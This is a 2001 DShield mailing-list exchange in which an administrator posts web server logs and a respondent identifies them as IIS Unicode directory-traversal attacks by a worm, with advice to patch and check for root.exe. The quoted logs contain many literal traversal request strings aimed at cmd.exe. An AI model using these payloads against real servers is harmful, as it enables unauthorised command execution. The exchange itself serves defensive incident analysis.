[Dshield] win32 exploit?

Scott Fendley scottf at uark.edu
Fri Aug 3 20:38:22 GMT 2001


If I remember correctly, this is a Unicode attack done by the poisonbox
worm that has been around for months now. I think poisonbox is actually
associated with the good ole sadmin (Solaris) to IIS unicode attack.  I
would verify that you have all your patches in place, and if you find
root.exe under your C:\inetpub (or where ever your website is located)
directory structure...then worry.  They have managed to move a copy of
cmd.exe into the directory structure and now can form commands to that exe
file to do more distructive things.

Scott



On Fri, 3 Aug 2001, Joseph Shraibman wrote:

> Does anyone know what this is?
>
> 216.26.139.35 - - [03/Aug/2001:13:24:59 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 200 201 "-" "-"
>
> [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
> bogus_host_without_reverse_dns 207.213.220.70 - - [06/Apr/2001:22:21:26
> -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 344
> bogus_host_without_reverse_dns 128.121.2.139 - - [16/Jun/2001:18:14:33
> -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 -
> error_log:[Fri Apr  6 22:21:26 2001] [error] [client 207.213.220.70]
> File does not exist:
> /local/www/apps253/bogus_host_without_reverse_dns/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> error_log:[Sat Jun 16 18:14:33 2001] [error] [client 128.121.2.139] File
> does not exist:
> /local/www/apps253/bogus_host_without_reverse_dns/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> error_log:[Sat Jul  7 23:57:50 2001] [error] [client 216.198.90.30] File
> does not exist:
> /local/www/apps253/apps/scripts/..Á?../winnt/system32/cmd.exe
> error_log:[Tue Jul 31 21:45:41 2001] [error] [client 61.151.231.33] File
> does not exist:
> /local/www/apps253/apps/scripts/..%5c%5c../winnt/system32/cmd.exe
> 207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 332
> 128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 332
> 216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 -
> 61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
> 207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 332 "-" "-"
> 128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 332 "-" "-"
> 216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 -
> "-" "-"
> 61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
> [Fri Apr  6 22:21:26 2001] [error] [client 207.213.220.70] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> [Sat Jun 16 18:14:33 2001] [error] [client 128.121.2.139] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> [Sat Jul  7 23:57:50 2001] [error] [client 216.198.90.30] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..Á?../winnt/system32/cmd.exe
> [Tue Jul 31 21:45:41 2001] [error] [client 61.151.231.33] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..%5c%5c../winnt/system32/cmd.exe
> 207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 328
> 128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 328
> 216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 -
> 61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
> 207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 328 "-" "-"
> 128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 328 "-" "-"
> 216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 - "-"
> "-"
> 61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
> "-" "-"
> [Fri Apr  6 22:21:26 2001] [error] [client 207.213.220.70] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> [Sat Jun 16 18:14:33 2001] [error] [client 128.121.2.139] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> [Sat Jul  7 23:57:50 2001] [error] [client 216.198.90.30] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..Á?../winnt/system32/cmd.exe
> [Tue Jul 31 21:45:41 2001] [error] [client 61.151.231.33] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..%5c%5c../winnt/system32/cmd.exe
>
>
> --
> Joseph Shraibman
> jks at selectacast.net
> Increase signal to noise ratio.  http://www.targabot.com
>
> _______________________________________________
> Dshield mailing list
> Dshield at dshield.org
> To change your subscription options (or unsubscribe), see: http://www1.dshield.org/mailman/listinfo/dshield
>




More information about the list mailing list